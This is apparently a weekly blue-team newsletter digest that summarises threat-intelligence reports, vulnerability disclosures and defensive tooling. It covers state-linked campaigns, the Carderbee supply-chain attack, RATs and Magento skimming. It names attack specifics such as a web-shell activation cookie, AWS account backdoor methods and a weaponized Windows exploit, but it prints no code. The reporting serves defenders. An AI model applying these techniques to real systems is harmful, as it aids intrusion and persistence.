Discover more from Cyber Defence Analysis for Blue & Purple Teams
Bluepurple Pulse: week ending August 27th
Chinese supply chain attack using signed code...
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week the Chinese reporting is of note including the use of signed code in a supply chain attack against South East Asian targets.
In the high-level this week:
Exposed: the Chinese spy using LinkedIn to hunt UK secrets - believed to have initially focused on defence contractors, civil servants and targets in sensitive business areas. He has since switched to targeting think tanks and academics who are still considered vulnerable and do not always realise the value of the information they possess.
First discovery of 'spy chip' in Chinese weather equipment - The National Intelligence Service recently discovered a backdoor that allows wireless eavesdropping or hacking in the weather observation equipment of public institutions in Korea.
Strong practical help for firms hit by cyberattack - (Australia) Firms and public agencies hit by cyberattacks are being promised a quick, compassionate and discreet response, aimed at minimising harms, says cyber defence leader, Abigail Bradshaw
Feds put cybersecurity for AI, quantum computing in the spotlight - A trio of government agencies on Monday urged organizations to prepare now for quantum computers’ ability to break through encryption, telling them to develop a “road map” for a future that grows near.
Post-Quantum Cryptography: CISA, NIST, and NSA Recommend How to Prepare Now - the NSA guidance
Open source research institute launches in Canberra - “.. in the hopes of establishing Canberra as an open source leader. Total investment in the institute is $2.3 million.”
Safeguarding the US Space Industry - Public awareness campaign from the US Government around intellectual property theft.
China deploys swarm of satellites to monitor military exercises in Australia - Enemy of State satellite scene but in real life..
China hoped Fiji would be a template for the Pacific. Its plan backfired - The specter of Chinese surveillance resurfaced last year when Beijing pushed a sweeping pact with 10 Pacific island nations that would have given China influence over policing, customs, cybersecurity, communications, deep-sea mining and more.
AI-generated art cannot receive copyrights, US court says - be interesting if this applies to code etc. as well.
Troops need improved cyber education, US Army leaders say - “Warfare is still — and we need only to take a look at Ukraine — a very violent endeavor. Cyber alone will not win a war, However, “failure to defend the networks that our warfighters use absolutely will cause us to lose.”
High Costs Won’t Deter Germany From Removing Huawei Parts - “We will prohibit components if they pose a serious security risk,”
Cybercrime: 14 arrests, thousands of illicit cyber networks disrupted in Africa operation - operation across 25 African countries that enabled investigators to arrest 14 suspected cybercriminals and identify 20,674 suspicious cyber networks, highlighting the surge in digital insecurity and cyber threats in the region.
Cyber security is global problem, declares G20 Digital Economy Ministers' meet -Union Minister Ashwini Vaishnaw on Saturday said there was a consensus during the G20 Digital Economy Ministers' Meeting that cyber security is an international problem that requires collaboration and steps for building trust and respect for other economies.
Ecuador hit by earthquake and cyberattacks amid presidential election - However Atamaint, president of the National Electoral Council, said the electronic voting system used by Ecuadorians living abroad was targeted by several cyberattacks, including from China, India and Bangladesh. She said the incidents did not jeopardize vote counts.
Brazilian hacker says Bolsonaro asked him to tamper with voting machine - A Brazilian hacker told a congressional inquiry on Thursday that former President Jair Bolsonaro asked him to tamper with an electronic voting machine to show Brazil's electoral system was vulnerable to fraud during last year's presidential campaign.
Tornado Cash Founders Charged With Money Laundering And Sanctions Violations - Roman Storm and Roman Semenov Charged with Operating the Tornado Cash Service, Laundering More Than $1 Billion in Criminal Proceeds
Army cyber officials want to harness AI, but not over-hype - “We're in the early stages of it," Maj. Gen. Paul Stanton said about an AI pilot program. "But my point is we're not sitting on the sidelines and watching, we're diving in.”
The reflection this week comes from the US firing the starting gun around preparation for a post quantum crypt world by building inventories.
It is no understatement to say that it is going to be a complex task to do well. That is to identify vulnerable uses of algorithms and associated trust infrastructure (e.g. certificate authorities we didn’t know existed). Let alone performing discovery across third-party dependencies and technology black boxes.
The reflection? Having lived through Y2K this feels like the mini scale cyber version of it which in reality is likely as complex when you move away from systems which automatically update..
Enjoying this? don’t get via e-mail? Subscribe:
Think someone else would benefit? Share:
Have a lovely Thursday
Cyber threat intelligence
Who is doing what to whom and how.
Summit Old, Summit New
Léa Ronzaud, Joseph A. Carter, and Tyler Williams provide insight into a contemporary Russian information operation. We can expect more of these as their own situation deteriorates I suspect..
Russia-linked actors engaged in a multi-pronged effort to influence online conversations around the July 2023 NATO Vilnius summit, using deceptive practices to advance narratives almost certainly intended to denigrate NATO and host nation Lithuania. These included disseminating documents purportedly hacked from the Lithuanian government, and seeding false claims about NATO’s spending and involvement in French domestic affairs.
The actors conducted two distinct influence operations, employing a range of inauthentic behaviors almost certainly intended to deceive online audiences. These tactics, techniques, and procedures (TTPs) included creating and disseminating bogus NATO press releases and operating fake personas across multiple online platforms.
North Korean hackers target U.S.-South Korea military drills, police say
Ju-min Park provides English reporting on a South Korean police release. Phishing was the method - have included the South Korean police reporting which uses a image for their press release so not easy to automatically translate.
The hackers were believed to be linked to a North Korean group that researchers call Kimsuky, and they carried out their hack via emails to South Korean contractors working at the South Korea-U.S. combined exercise war simulation centre, the Gyeonggi Nambu Provincial Police Agency said in a statement.
$200M in Crypto Stolen in 2023; Over $2B in the Last Five Years
We have covered the scale of their crypto thefts before, but it is worth reminding ourselves it continues..
Over the past five years, North Korean hackers have stolen over USD 2 billion in cryptocurrencies in over 30 attacks, according to TRM Labs. While reports have indicated the amount of crypto stolen by North Korea since 2018 to be as high as $3 billion, our research indicates that this figure likely includes multiple large hacks misattributed to North Korea.
In 2023, although the total amount stolen in cryptocurrency attacks is down from a record-setting 2022, North Korea has maintained its focus on the crypto ecosystem. Year-to-date, North Korea has stolen USD 200 million in cryptocurrency, accounting for over 20% of all stolen crypto this year.
FBI Identifies Cryptocurrency Funds Stolen by DPRK
As further reminder the FBI has released this insight from a couple of days ago as North Korea look to cash out. Everyone will be watching to see where the trail stops…
The FBI is warning cryptocurrency companies of recent blockchain activity connected to the theft of hundreds of millions of dollars in cryptocurrency. Over the last 24 hours, the FBI tracked cryptocurrency stolen by the Democratic People's Republic of Korea (DPRK) TraderTraitor-affiliated actors (also known as Lazarus Group and APT38). The FBI believes the DPRK may attempt to cash out the bitcoin worth more than $40 million dollars.
Analyzing the new attack activity of the Andariel group
South Korean reporting on recent North Korean activity which is state aligned. The take away here is they aren’t only using phishing but also exploiting vulnerabilities (which we have covered previously).
the case of attacking a domestic university by exploiting Innorix Agent and the case of installing malicious code in domestic companies through an attack presumed to be spear phishing, were dealt with. Here, we summarize the grounds for assuming that the two types of attacks were performed by the same attacker
GroundPeony: Crawling with Malice
Rintaro Koike and Shota Nakajima detail a suspected Chinese state campaign which used run of the mill tradecraft coupled with a degree of pre positioning.
In March 2023, we discovered a cyber attack campaign targeting Taiwanese government agencies. The campaign employed devious tactics such as tampering with legitimate websites to distribute malware, using URL obfuscation, and employing multi-stage loaders.
Carderbee: APT Group use Legit Software in Supply Chain Attack Targeting Orgs in Hong Kong
At the more sophisticated supply chain end of business there is this. The response and change of process within MSFT if any will be interesting to see here.
A previously unknown advanced persistent threat (APT) group used the legitimate Cobra DocGuard software to carry out a supply chain attack with the goal of deploying the Korplug backdoor (aka PlugX) onto victim computers.
In the course of this attack, the attackers used malware signed with a legitimate Microsoft certificate. Most of the victims in this campaign are based in Hong Kong, with some victims based in other regions of Asia.
Cobra DocGuard Client is software produced by a China-based company called EsafeNet and appears to legitimately be used to protect, encrypt, and decrypt software. EsafeNet is owned by Chinese information security firm NSFOCUS.
Analysis of APT attack cases targeting web services of domestic companies
South Korean reporting on a few bits including a suspected Chinese state actor as well as North Korean one. The Chinese tradecraft will be familiar to many..
According to KISA's report, the attacker used a file upload vulnerability on the homepage of the victim company to upload the web shell as an attachment. The attacker is said to have additionally uploaded a secondary web shell (1.asp) to the general path, not the upload path, using the primary web shell uploaded for the first time. "1.aspx" exists.
No public reporting this week
XLoader’s Latest Trick | New macOS Variant Disguised as Signed OfficeNote App
Dinesh Devadoss and Phil Stokes detail a campaign which shows that threat actors are evolving their macOS tradecraft including getting code signed.
XLoader has returned in a new form and without the dependencies. Written natively in the C and Objective C programming languages and signed with an Apple developer signature, XLoader is now masquerading as an office productivity app called ‘OfficeNote’.
The new version of XLoader is bundled inside a standard Apple disk image with the name
OfficeNote.dmg. The application contained within is signed with the developer signature
MAIT JAKHU (54YDV8NU9C).
The application was signed on 17 July, 2023; however, Apple has since revoked the signature.
Smoke Loader Drops Whiffy Recon Wi-Fi Scanning and Geolocation Malware
Interesting turn of events where a threat actor is trying to find the physical location of devices. Why? We may never know..
[We] observed the Smoke Loader botnet dropping a custom Wi-Fi scanning executable to infected systems. [our] researchers named this malware Whiffy Recon. It triangulates the infected systems' positions using nearby Wi-Fi access points as a data point for Google's geolocation API.
Syrian Threat Actor EVLF Unmasked as Creator of CypherRAT and CraxsRAT Android Malware
The Syrian connection is point of note, Domestic capabilities which start off in the criminal world could in time be repurposed or otherwise transition as we have seen in the likes of Russia etc.
EVLF has created a web shop for CraxsRAT on the surface web to assert legitimacy to interested threat actors.
Eventually, some of the threat actors who purchased the software from EVLF started releasing cracked versions of the RATs to the black hat community for free (some of them backdoored as well). This exponentially shot up the reachability of these RATs, highly increasing the number of active users.
The threat actor is operating from Syria.
In some of the recent research reports, CraxsRAT is being described as a downloader in an attack on a Windows-based OS. However, as per our investigation and the official website of CraxsRAT, we can confirm that CraxsRAT only targets Android devices. Our research team believes that cracked versions of CraxsRAT builders (that are meant to run on Windows machines) are being distributed in forums with pre-existing backdoors of other malware/ransomware. One of these backdoored samples was analyzed in these reports, due to which CraxsRAT has been categorized as malware that targets Windows.
MalDoc in PDF - Method of embedding malicious Word files into PDF files to avoid detection
Reporting from Japan on a technique to provide a container around malicious Microsoft Office documents to avoid detection.
JPCERT/CC has confirmed that a new technique (hereafter referred to as MalDoc in PDF in this article) that embeds a malicious Word file into a PDF file to evade detection was used in the attacks that occurred in July.
ProxyNation: The dark nexus between proxy apps and malware
Ofer Caspi provides insight into criminally built proxy networks.
[We] identified a company that offers proxy services, wherein proxy requests are rerouted through compromised systems that have been transformed into residential exit nodes due to malware infiltration. Although the proxy website claims that its exit nodes come only from users who have been informed and agreed to the use of their device, [we have] evidence that malware writers are installing the proxy silently in infected systems. In addition, as the proxy application is signed, it has no anti-virus detection, going under the radar of security companies.
JanelaRAT: Repurposed BX Rat Variant Targeting LATAM FinTech
Gaetano Pellegrino and Sudeep Singh provide insight into criminal targeting in Latin American. There is a degree of sophistication here which does the actor or actors has relative technical capability, albeit one readily available in commercial teams the globe over.
Financial Data in LATAM: As of June 2023, JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions.
New, Nefarious Capabilities: JanelaRAT features a windows titles sensibility mechanism that allows the malware to capture window title data and send it to the threat attackers.
Strategic and Exploitative Behavior: JanelaRAT employs a dynamic socket configuration system. The C2 infrastructure used by the threat attackers heavily abuses dynamic DNS services. Each domain is set up in the infrastructure to be active only on a certain day of the month.
Evasive Maneuvers: JanelaRAT abuses DLL side-loading techniques from legitimate sources (like VMWare and Microsoft) to evade endpoint detection.
Origin of Threat Actor: The developer of JanelaRAT is Portuguese-speaking. There is heavy use of Portuguese in the malware strings, metadata, decrypted strings, etc.
Xurum: New Magento Campaign Discovered
Ron Mankivsky, Dennis German, Chen Doytshman and Maxim Zavodchik provide reporting on one of the more sophisticated skimmer teams. This is one of those problems (as we have largely done in the UK) where banking could kill this overnight with extra verification if they wished.
[We] have discovered an ongoing server-side template injection (CVE-2022-24086) campaign that is exploiting digital commerce websites. This campaign targets Magento 2 shops, and we have dubbed it Xurum in reference to the domain name of the attacker’s command and control (C2) server.
We have observed activity in this campaign since at least January 2023. The attacker seems to be interested in payment stats from the orders in the victim's Magento store placed in the past 10 days.
The attacker registers a new Magento component and masks it as “GoogleShoppingAds.”
The attacker uses an advanced web shell named “wso-ng” that is activated only when the attacker sends the cookie “magemojo000” to the backdoor “GoogleShoppingAds” component.
How we find and understand the latent compromises within our environments.
Deep Dive Into Windows Diagnostic Data & Telemetry (EventTranscript.db)
P. Abhiram Kumar provides a useful tip / warning here. Should these types of bugs are interesting as in a lot of vendors they won’t be considered security issues although they are potentially security impacting in the broadest of senses.
Few weeks ago, I published a twitter thread where I observed the SHA1 hash values were wrongly picked up by Windows Diagnostics.
The hash is stored in Amcache.hve style with four zeroes (0000) preceding the hash value.
While experimenting on this I found that sometimes the field can record an incorrect hash of a binary provided a few things. We delve into this now.
How we proactively defend our environments.
From our friends at Google..
DFIQ is a collection of Digital Forensics Investigative Questions and the approaches to answering them. The goal of the project is to build a comprehensive catalog of investigative knowledge to help drive consistent, thorough, and explainable investigations.
How to troubleshoot Live Response in Defender for Endpoint
Jeffrey Aappel provides some practical advice for those deploying Defender for Endpoint in Live Response environments. Again great to see practitioners giving field reports based on the real world in open source to the community.
In the past years, I deployed Defender for Endpoint in many large environments and discovered sometimes “issues/limitations” related to the Live Response capability. Common examples;
Session slow/ Commands slow
File not collected
No result or status update
History of live response commands
Delay in Live Response connectivity
In this blog, I will explain the troubleshooting capabilities more in-depth with a strong focus on situations where Live Response is not working as expected.
Tracking An Adversary In Real-Time Using Velociraptor
Jos Clephas shows a neat usage of Velociraptor in a real-time setting. What is excellent about their world is the performance considerations piece where they show how to monitor for CPU/RAM utilization impact so you don’t crator production.
This blog post shows you two practical examples on how to detect adversary activity and alert on it using Velociraptor. It is an extension of part I, which provides two other examples. You can find part I here.
Android Data Encryption in depth
Maxime Rossi Bellom and Damiano Melotti detail the independent research behind the quality of the implementation.
Android Disk Encryption is definitely an interesting feature to play with. The first takeaway should probably be on how solidly designed the schema is overall: by combining several pieces coming from different components, it requires an attacker to have very powerful vulnerabilities to defeat it. Trusted chips guarantee an even higher security level, by adding an additional target to be attacked, with a limited attack surface. And still, even after obtaining all the required bits, the credentials need to be bruteforced. While custom hardware can overcome the limitations imposed by scrypt, a very long passphrase remains very hard to guess.
Our attack surface.
CVE-2023-38035: Vulnerability affecting Ivanti Sentry
When there is blood in the water the vulnerability researcher sharks circle your products is the lesson here.
A vulnerability has been discovered in Ivanti Sentry, formerly MobileIron Sentry. We have reported this as CVE-2023-38035. This vulnerability impacts all supported versions – Versions 9.18. 9.17 and 9.16. Older versions/releases are also at risk.
If exploited, this vulnerability enables an unauthenticated actor to access some sensitive APIs that are used to configure Ivanti Sentry on the administrator portal (commonly, MICS). While the issue has a high CVSS score, there is low risk of exploitation for customers who do not expose 8443 to the internet.
SAP Security: Vulnerability Analysis
Arpine Maghakyan and team provide some data on SAP systems exposed to the Internet and the level of vulnerability. I shared this with a colleague who rightly suggested if they had included the EPSS value it would have been really useful.
[We] undertook an extensive study focusing on the security of SAP systems. Our research involved a comprehensive scan of 10,000 public IP addresses associated with SAP systems. The findings from this study are both enlightening and concerning:
Total Vulnerabilities Detected: 12,875
From the systems analyzed, vulnerabilities were identified in a staggering 3,094 of them. When categorized by the severity of the vulnerabilities, the distribution was as follows:
mTLS: When certificate authentication is done wrong
Michael Stepankin provides a valuable lesson to anyone using mTLS in production who might assume they know how it works and what the inherent vulnerabilities are..
In this post, I’ll deep dive into some interesting attacks on mTLS authentication. We won’t bother you with heavy crypto stuff, but instead we’ll have a look at implementation vulnerabilities and how developers can make their mTLS systems vulnerable to user impersonation, privilege escalation, and information leakages.
We will present some CVEs we found in popular open-source identity servers and ways to exploit them. Finally, we’ll explain how these vulnerabilities can be spotted in source code and how to fix them.
If you’re developing an mTLS system or performing a security assessment, I suggest:
Pay attention when extracting usernames from the mTLS chain, as the servers only verify the first certificate in the chain.
Use Certificate Stores with caution, as it can lead to LDAP and SQL injections.
Certificate revocation can lead to SSRF or even to RCE in the worst case. So, do the revocation check only after all other checks and do not rely on URLs taken from the certificate extensions.
Attack capability, techniques and trade-craft.
Methods to Backdoor an AWS Account
Fawaz Masood Qureshi provides a further lesson on the complexity of cloud and the novel security challenges which stem from it. The various backdoor techniques covered include:
Temporary Security Credentials
Changing Security Group
EC2 UserData Script
EC2 SSM Send-Command
I suspect many wont be looked for in incident response.
Detecting Excessive Data Exposures in Web Server Responses with Metamorphic Fuzzing
Lianglu Pan, Shaanan Cohney, Toby Murray and Van-Thuan Pham highlight a few things through this work.
The web and its technology stack is still rich in shallow vulnerabilities
Fuzzing in the web context can yield significant value
We have much to do..
Excellent work, but terrifying results.
In this work, we develop a metamorphic relation to tackle that challenge and build the first fuzzing tool -- that we call EDEFuzz -- to systematically detect EDEs. EDEFuzz can significantly reduce false negatives that occur during manual inspection and ad-hoc text-matching techniques, the current most-used approaches.
We tested EDEFuzz against the sixty-nine applicable targets from the Alexa Top-200 and found 33,365 potential leaks -- illustrating our tool's broad applicability and scalability. In a more-tightly controlled experiment of eight popular websites in Australia, EDEFuzz achieved a high true positive rate of 98.65% with minimal configuration, illustrating our tool's accuracy and efficiency.
What is being exploited.
CVE-2023-36874: PoC for LPE in Windows Error Reporting Service
Filip Dragović replicates a vulnerability originally found in the wild which was described as:
[We discovered] unknown exploit kit leveraging a still-unknown vulnerability affecting the Windows Error Reporting (WER) component. Our team prepared to report this newly discovered vulnerability to Microsoft — only to discover that the Google Threat Analysis Group had independently discovered and disclosed it shortly before we did. Microsoft assigned the identifier CVE-2023-36874 to the vulnerability.
This is that exploit weaponized for all to use.
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
IODA (Internet Outage Detection and Analysis)
Maybe useful to some.
an operational prototype system that monitors the internet, in near-realtime, to identify macroscopic Internet outages affecting the edge of the network, i.e. significantly impacting an AS (Autonomous System) or a large fraction of a country.
Generating FLIRT signatures for Nim and other non-C programming languages
Holger Unterbrink Fast Library Identification and Recognition Technology (FLIRT) signatures to other languages in IDA.
for Nim, generating signatures is distinctly more difficult. The techniques described in this blog post focus on how to overcome the challenges associated with generating a signature file for the Nim programming language. However, these techniques can easily be applied to other languages or situations where malware authors use special and uncommon compiler switches to make standard library profiling more challenging for investigators.
Some other small (and not so small) bits and bobs which might be of interest.
Monthly Threat Actor Group Intelligence Report, June 2023 (ENG) - from Korea and lagged.
IR 8477, Mapping Relationships Between Documentary Standards, Regulations, Frameworks, and Guidelines: Developing Cybersecurity and Privacy Concept Mappings - This document describes an approach that NIST would use and other parties could use for mapping the elements of documentary standards, regulations, frameworks, and guidelines to NIST publications, such as CSF Subcategories or SP 800-53r5 controls.
A Little Bit Of History - the story behind how Assemblyline got started - the Canadian Governments opensource malware analysis pipeline